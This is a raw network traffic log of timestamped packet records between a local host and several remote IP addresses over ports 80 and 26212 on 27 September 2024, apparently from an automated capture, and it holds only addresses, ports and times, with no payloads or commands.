Sep 27, 2024 04:21:16.762650967 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762671947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762787104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762804985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762814999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762820005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762825966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762830019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762859106 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762887001 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.763715982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.763726950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.763732910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.763777971 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.763878107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.763891935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.763902903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.763921022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.763925076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.763932943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.763937950 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.763967037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.765247107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.765258074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.765268087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.765274048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.765279055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.765285015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.765290022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.765295982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.765319109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.765328884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.765374899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.765414953 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.766639948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.766650915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.766669989 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.766681910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.766794920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.766807079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.766817093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.766824961 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.766828060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.766839981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.766839981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.766860962 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.766875982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.766967058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.766997099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.767600060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767608881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767618895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767625093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767635107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767642021 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.767647028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767658949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767658949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.767690897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.767828941 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.767887115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767898083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767909050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767918110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767923117 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.767930984 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767937899 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.767941952 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.767951965 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.767956018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.767978907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.767997026 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.768022060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.768034935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.768043041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.768059969 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.768075943 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.768084049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.780172110 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:16.785195112 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.794498920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794511080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794523001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794550896 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.794579983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.794640064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794651031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794661999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794672966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794678926 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.794692993 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.794708967 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.794765949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794776917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794805050 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.794828892 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.794944048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794955969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794966936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794979095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.794981003 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.794996977 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.795017004 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.795137882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.795150995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.795183897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.795202017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.800920010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.800932884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.800942898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.800947905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.800955057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.800970078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.800990105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.801019907 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.801043987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.801054955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.801085949 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.801096916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.802450895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.802459002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.802468061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.802478075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.802484989 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.802489042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.802503109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.802536964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.802614927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.802627087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.802649021 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.802676916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.802953005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.802994013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.807327986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.807337999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.807347059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.807353973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.807363987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.807373047 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.807399035 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.807420015 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.807470083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.807482958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.807492018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.807507038 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.807533026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.808092117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.808104038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.808115959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.808139086 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.808151007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.808271885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.808284044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.808295965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.808305979 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.808315039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.808320045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.808331966 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.808347940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.808437109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.808469057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.808818102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.808830023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.808840036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.808851004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.808866024 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.808891058 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.808912992 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.808947086 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.808958054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.808969021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.808979988 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.808983088 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.809006929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.809026003 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.809146881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809202909 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809214115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809225082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809235096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809247017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809248924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809257984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809266090 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809269905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809282064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809282064 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809299946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809318066 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809335947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809783936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809793949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809803963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809808016 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809809923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809820890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809843063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809861898 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809940100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809950113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809959888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809969902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809982061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809983969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.809990883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.809998989 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.810028076 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.810122967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810134888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810144901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810154915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810158968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.810165882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810178041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810184002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.810192108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810214996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.810230970 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.810367107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810378075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810388088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810400009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810410023 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.810412884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810417891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810427904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.810430050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.810451031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.810463905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811106920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811117887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811129093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811137915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811146975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811152935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811161041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811173916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811194897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811269045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811283112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811292887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811305046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811328888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811435938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811448097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811459064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811469078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811469078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811480045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811480045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811492920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.811496973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.811522007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.824371099 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.824383020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.824393034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.824424028 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.824445009 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.824532032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.824543953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.824557066 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.824568033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.824574947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.824592113 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.824604988 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.824620008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.824644089 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.836442947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836457014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836467028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836491108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836515903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836584091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836601019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836611986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836616993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836622000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836622953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836636066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836642981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836647034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836654902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836673021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836680889 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836685896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836694956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836698055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836709976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836720943 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836721897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836734056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836744070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836745024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836760998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836761951 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836775064 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836775064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836788893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836798906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836800098 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836811066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836819887 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836824894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836836100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836841106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836848021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.836858988 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.836884022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.837027073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.837038994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.837121010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.837136030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.837150097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.837157965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.837174892 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.837196112 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.850788116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.850801945 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.850814104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.850821018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.850843906 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.850872993 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.850925922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.850938082 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.850949049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851036072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851036072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851119041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851133108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851145029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851155996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.851162910 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.851170063 CEST	80	49724	176.113.115.95	192.168.2.5
